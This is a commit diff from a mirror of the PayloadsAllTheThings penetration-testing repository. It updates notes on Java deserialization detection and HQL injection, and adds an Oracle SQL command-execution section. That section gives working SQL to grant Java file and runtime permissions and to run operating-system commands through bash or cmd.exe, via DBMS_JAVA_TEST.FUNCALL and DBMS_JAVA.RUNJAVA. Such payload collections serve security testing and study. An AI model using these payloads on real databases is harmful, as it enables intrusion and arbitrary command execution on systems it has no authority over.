ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Oracle SQL

Browse Source
This commit is contained in:
Swissky 2022-09-13 22:04:21 +02:00
parent 0ca060c049
commit c7dd67986c
3 changed files with 38 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Insecure Deserialization/Java.md
View File

@ -2,10 +2,12 @@
## Detection
- "AC ED 00 05" in Hex
- "rO0" in Base64
- `"AC ED 00 05"` in Hex
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
* `00 05`: STREAM_VERSION. The serialization version.
- `"rO0"` in Base64
- Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64)
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Exploit

4
SQL Injection/HQL Injection.md
View File

@ -15,6 +15,8 @@
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
## HQL Comments
```sql
@ -134,7 +136,7 @@ public class Constants {
Some usable constants in well-known Java libraries:
```
```ps1
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]

31
SQL Injection/OracleSQL Injection.md
View File

@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
```
## Oracle SQL Command execution
## Oracle SQL Command Execution
* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
### Oracle Java Execution
* List Java privileges
```sql
select * from dba_java_policy
select * from user_java_policy
```
* Grant privileges
```sql
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
```
* Execute commands
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
```sql
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
```
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```
### Oracle Java Class
```sql
/* create Java class */
BEGIN
@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)